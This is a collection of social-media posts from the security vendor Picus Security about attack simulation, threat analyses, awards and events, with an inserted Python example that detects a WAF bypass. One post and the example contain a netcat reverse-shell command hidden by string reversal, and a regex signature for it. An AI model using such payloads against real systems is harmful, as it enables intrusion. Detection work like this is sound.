A new technical analysis by Picus Labs! We revealed the Tactics, Techniques and Procedures (#TTPs) used in the #SolarWinds #breach. Attackers used 20+ MITRE ATT&CK techniques. Take a look to read a detailed analysis of attack methods used by threat actors.
Wondering what actions you can take against leaked FireEye tools? No worries, Picus Labs analyzed all the 60 tools and revealed Tactics, Techniques and Procedures (#TTPs) used by them. Read our latest blog post for a detailed analysis and recommendations.
Picus has raised a $24M Series B funding!
Learn more about the plans and how Picus intends to continue improving its platform to offer the most comprehensive solution for security control validation in this latest blog by Alper Memis, Co-founder and CEO.
A command injection WAF bypass method discovered by Picus Labs researcher @evrnyalcin.
It uses "rev" and "printf" commands in command substitution.
Example: $(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)
Read the write-up for details and mitigations:
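The reversal trick in the post above defeats a filter that only matches the literal command text. As an added example (not from the post or from Picus), this Python check un-reverses quoted literals piped to `rev` inside a command substitution before applying a signature; the signature, the function names and every sample value except the post's own example are constructed for illustration.

```python
import re

# Constructed stand-in for a literal WAF signature; real rule sets differ.
SIGNATURE = re.compile(r"\bnc\b.*-e\s+/bin/(?:ba)?sh")

# Body of a $(...) or `...` command substitution.
SUBSTITUTION = re.compile(r"\$\(([^()]*)\)|`([^`]*)`")
# A quoted literal piped into rev, e.g. printf '...'|rev
REVERSED_LITERAL = re.compile(r"""(['"])(.*?)\1\s*\|\s*rev\b""")


def decoded_literals(value):
    """Un-reverse every quoted literal piped to rev inside a substitution."""
    decoded = []
    for match in SUBSTITUTION.finditer(value):
        body = match.group(1) or match.group(2) or ""
        for literal in REVERSED_LITERAL.finditer(body):
            decoded.append(literal.group(2)[::-1])
    return decoded


def inspect(value):
    """Classify one request parameter value."""
    if SIGNATURE.search(value):
        return "blocked: signature"
    literals = decoded_literals(value)
    if any(SIGNATURE.search(text) for text in literals):
        return "blocked: signature after un-reversing"
    if literals:
        return "flagged: reversed literal in command substitution"
    return "allowed"


# Sample parameter values; the second is the example quoted in the post,
# the others are constructed.
SAMPLES = [
    "nc 127.0.0.1 1234 -e /bin/bash",
    "$(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)",
    "$(printf 'imaohw'|rev)",
    "report-2021.pdf",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{inspect(sample):52} {sample}")
```

Pattern normalization of this kind only narrows the gap; the durable fix is on the application side, where user input should never reach a shell.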
We've received a significant demand to publish our #BlueTeam Recommendations to defend against FireEye's stolen #RedTeam Tools.
In our new blog post, we shared our detection and prevention contents as #SIGMA and vendor queries, and prevention signatures.
🔴 Our red team engineer Furkan Göksel created a tool for in memory PE execution. This tool can be used to encrypt, embed and load given PE files. Check this out ⬇️
#redteam #infosec #picussecurity
We are proud to be listed as a representative Breach and Attack Simulation (BAS) Vendor in the latest @gartner research conducted by @anton_chuvakin and @apbarros
#ChatGPT has been receiving a lot of attention from information security professionals over the past week.
Learn more about Dr. Suleyman Ozarslan's experiment and how ChatGPT is changing the way #cybersecurity practitioners look at the potential of #AI
Picus Endpoint Simulation Module (ESM) is empowered with the “Impact” tactic recently added to the MITRE’s ATT&CK Framework and the techniques covered by this tactic. Picus Labs follows updates to the ATT&CK framework and enhances the Picus Threat Database accordingly.
#ATT&CK
#RSAC2020 is just around the corner! Schedule a meeting with the team and learn more about #Picus #BreachAndAttackSimulation Platform. We look forward to meeting you there! Click the link to schedule a meeting:
#RSAC2018 has already started! We are excited to show you our continuous Breach and Attack Simulation Platform in action, don't forget to come and say hi!
We’re truly excited to be recognized for our innovations in the Breach and Attack Simulation (BAS) Category in Annual Cybersecurity Breakthrough Awards Program.
@InfoSec_Awards #CyberSecurity #award2018
We are excited to announce that Picus has joined the @msftsecurity Intelligent Security Association (#MISA). The Platform now helps security teams achieve the best possible protection from Microsoft Defender for Endpoint and Microsoft Sentinel. Learn more:
It’s a wrap!! Our team had the best time at #RSAC19, huge thank you to everyone who came to visit our booth this week!
If you missed it, don’t sweat, you can come see us next year!
Picus is the first Breach and Attack Simulation (BAS) platform that has released an attack simulation and a detection rule for CVE-2020-0601 Windows CryptoAPI Spoofing Vulnerability.
Picus provides our users not only the attacks but also the necessary defense signatures.
Our new blog post explains how the Breach and Attack Simulation (BAS) approach fits into the vulnerability scanning, penetration testing and red teaming continuum in reference to the Adversarial Attack Simulations Exercises (“AASE”) Guidelines.
#BAS
At #SOCReLoad21, @DavidJBianco spoke about the ‘Defender’s Dilemma’ and why it's a misleading proposition built upon four false assumptions or ‘lies’. View this summary infographic to discover some key takeaways from the session. Watch on-demand ➡️
Is your security infrastructure ready for #Spectre (#CVE-2017-5715 branch target injection) and #Meltdown (#CVE-2017-5754 rogue data cache load) PoC attacks? Picus' customers already have the answer!
Our CTO @aytekyuksel spoke on a panel today along with participants from @eBay & @VMware about “Building a Zero Trust Model with Next Generation Segmentation” at the Cloud Security Summit hosted by @PaloAltoNtwks. Come chat with us at our Booth before the end of the event!
How do you uncover a #malicious VBA macro code hidden using 15 different #obfuscation methods❓
Check out our new blog post "Emotet Technical Analysis - Part 1 Reveal the Evil Code" for step by step deobfuscation of a recent #Emotet malware document📄.
SC Media named Picus Continuous Security Validation Platform a “2019 Innovator in the Analysis and Testing category”! To find out why SC Media Labs chose #Picus as an innovator, click to read:
We're partnering with @F5Networks to ensure that #WAF admins & security managers can dynamically identify, measure and mitigate #securitythreats targeting applications. Learn more here:
Researchers list the top 20 vulnerabilities currently exploited by threat groups.
Picus simulates all of them in addition to 634 vulnerability attacks and 124 APT groups.
Top 3 vulnerabilities:
• CVE-2017-11882
• CVE-2018-8174
• CVE-2017-0199
⭐We have very good news! Picus is a finalist in six categories at the @CSMagAndAwards
🚀This includes Breach and Attack Simulation Solution of the Year. We would greatly appreciate your support by voting for us here:
"Cybersecurity exists until you are breached” says @peteherzog in his recent blog post, addressing the most prevalent “how”, “what" and “why” questions about #breach and #attack simulation (BAS) technology. Check out Part 1 via
Do you know emerged #XSS payloads without parentheses, semi-colons and string literals #bypass some signature-based filters of Web Application Firewalls (#WAFs) and browsers?
Test your security controls now with 300+ XSS payloads included in the Picus Threat Database
We have included exploits of the new #Adobe #Flash 0-day #vulnerability (#CVE-2018-15982) in our ThreatDB within hours of appearing. Our customers are advised to test their #security #controls against these exploits allowing control over the victim system.
#MITRE ATT&CK can be complex starting out.
We came up with The Red Report to untangle this, offering practical info e.g. simulation techniques, detection rules, and much more! Stay tuned as we’ll be posting snippets of these gems in the next few weeks!
We are honored to announce @PicusSecurity co-founders are among 25 high-impact entrepreneurs selected by @endeavor_global at the 84th International Selection Panel (ISP) held in South Africa last week.
Read more here:
I am honored to have been asked to join the Advisory Board for @PicusSecurity. Picus play in the Breach and Attack Simulation market, and I am excited to be able to contribute to and learn about this new and emerging security domain.
A new technical analysis by Picus Labs! We revealed the Tactics, Techniques, and Procedures (#TTPs) used by HAFNIUM to target #MicrosoftExchange servers. Attackers use 15 MITRE ATT&CK techniques. Take a look to read a detailed analysis of #attack methods.
We are honored to announce our partnership with @LutechGroup, one of Europe’s leading players in ICT services and solutions.
Picus #Breach and #Attack #Simulation Platform address concerns on the cybersecurity readiness of Lutech's customers.
Read more:
1/10: Get excited everyone 🚨🚨🚨 we’re doing another tweetstorm on a #MITRE ATT&CK technique - T1086 Powershell by our very own Dr. Süleyman Özarslan.
Before we get started, what do you guys find more helpful: red teaming or blue teaming?
#infosec #cybersecurity
Did you know that each month over 8,000 businesses are targeted by email-based attacks? By using Picus “Email Threat Simulation” feature, you can now test your email security controls in real-time and instantly mitigate security gaps.
🚨How to test your ability to prevent, detect and respond to this new #Log4J exploit? The Picus platform can help you test your readiness by simulating this exploit against your security controls on a truly continuous basis. Discover how we do it ⬇️
🍰 We’re wondering if @MuseeLouvre simulated a cake attack at some point to ensure the security glass can properly protect this highly critical asset😁. Are you doing the same for your key assets? 🚀 With Picus, simulate real-world attacks to test your defenses within minutes.
Picus is the first BAS vendor to add coverage for attacks that exploit PrintNightmare (CVE-2021-1675) vulnerability affecting even fully patched Windows systems. Get more info from our latest blog:
#informationsecurity #cyberattack #printnightmare
#Sodinokibi ransomware has caused trouble in targeted attacks, spread by spear-phishing, exploits, remote services and compromised websites.
Check out further insights in our blog post 'Cyber Crime Turns Cyber Racket - Tackling Ransomware Before It Hits':
🎊The Series B funding is a significant milestone toward our vision of making #SecurityControlValidation an integral part of every organization's day-to-day security activities ➡️ Read the CEO announcement to learn more about our future plans 🚀
Our blue team leader @oguzpamuk has developed a tool for users of Carbon Black EDR that assists in identifying watchlists defined as 'expensive', which may negatively impact product performance and detection monitoring processes. ⬇️
The Ranzy Locker ransomware has been responsible for high-profile breaches since 2020. According to the recent FBI report, Ranzy had compromised over 30 businesses in the U.S. alone. Check out our latest blog post where we analyzed TTPs utilized by Ranzy.
Why do you need Continuous Security Validation? Download our #whitepaper “Breach and Attack Simulation: A Novel Cybersecurity Validation Approach” to discover the value of a threat-centric approach to your security operation.
#informationsecurity
Announcing our next ATT&CK in Action webinar!
This week, we're putting T1036 Masquerading in the hot seat - the fourth most commonly used technique used by adversaries in 2019.
Register now and join Picus and @shelldaemon from @Darktrace on July 16th.
🚀 Introducing Cloud Security Validation, the latest addition to The Picus Platform.
Learn how CSV simulates real-world cloud attack scenarios to help you proactively identify and address cloud risks, and validate that cloud controls work as expected.
How to Build a #RedTeaming Attack Scenario | Part 1: Bypass #Security Controls
Developing attack scenarios is an essential part of a #RedTeam operation. Read the blog to discover the design and development phase of an #attack scenario:
#cybersecurity
The Picus Threat Database now includes the new #spamcampaign launched by the threat actors behind #Emotet, issued with a @USCERT alert. It spreads through seemingly legitimate Word/PDF files sent to targets in the US, the UK, Turkey & South Africa. @ESET
May the forces of hackers become confused on the way to your security controls - or even better, stay proactive and start validating! Picus Security wishes you a healthy, happy, and secure new year. ✨️✨️
We will be exhibiting with @EXN_UK at @Infosecurity 2018 next week. Join our experts to discuss the most pressing issues in cybersecurity and let them show you how Breach and Attack Simulation works in action! #infosecurity2018
Thank you so much for all the contributors who made us have one of the highest scores in the Breach & Attack Simulation Market! We love to read your feedback, and we do love to share them ♥️
The second day of the CPX 360 organized by @CheckPointSW in Vienna is underway! If you’re around, make sure you drop by our stand, chat with our experts and find out how Continuous Security Enhancement works in action.
#CPX360 #CyberSecurity
Cyber Rangers Web Series 🤖 Season 1-Episode 2:
"8 Steps to Deal with COVID-19 in Cyber Security"
🗓️ April 2 - 11AM GMT. Register Now:
#Covid19 #security #webinar #blueteam
🚀 Picus is organizing the second Bootcamp with @patika_dev “Picus Cyber Talent Academy” now! 💻 Join the Academy 🌎 Finish a world-class #cybersecurity training
🎓 Get the chance to work at Picus! Learn more ➡️
Picus Threat Database is updated with the recent PDF files exploiting double zero-days, namely #CVE-2018-4990 RCE in Adobe Reader and #CVE-2018-8120 Privilege escalation in Microsoft Windows.
You can find out more about these zero-days via:
Last year's SOCReload Event on building a proactive SOC was greatly enhanced by @peteherzog participation. 🎉SOCReLoad is back! Join us at #SOCReLoad21 to hear thought leaders from across the industry discuss ways to modernize security operations:
🚨Log4j wreaking havoc has a far greater impact than anticipated. 🚀 No worries, this blog explains how to simulate CVE-2021-44228 attacks before real attackers and how to utilize their WAF and IPS to prevent these attacks. 💪 Click here to learn more:
🎄 Picus Security wishes you a healthy, happy, and cyber secure new year. 🎊
We wish all the attacks that hit you in 2021 to be the ones simulated by Picus!
Dacls #RAT targeting Windows and Linux is linked with #Lazarus Group. It exploits #Confluence CVE-2019-3396 vulnerability for spreading. Test your security controls against 600+ #exploits and 100+ #APTs with Picus. Request a demo:
We would like to announce the 10 lucky winners who participated in our System Information Discovery Webinar and won a book of @erdal_ozkaya! Thank you for your interest in our webinar.
And we would like to once again thank @erdal_ozkaya for having a webinar with us.
.@Webroot recently ranked the Nastiest #malware of 2018 proved to be the most detrimental to users throughout the year.
@Picus clients rest assured, we’re ahead of the game: the full list was already in our extensive #Threat Database!
Picus Threat Database is updated with the most recent Flash 0-day vulnerability, tracked as CVE-2018-5002, impacting users with Adobe Flash Player 20.0.0.171 and earlier versions.
Find out more about this vulnerability:
What are the key components to supercharge your security operations? Don't miss this keynote of @CCrowMontance where he shares actionable insights on modernizing your security operations. You can now watch it on demand!
Join us at #BlackHatUSA to meet our CEO Alper Memis!
Booth #2700 is your destination for live demos, swag, and a photo op with the best fighter pilot in the Navy on August 9th!
Learn more: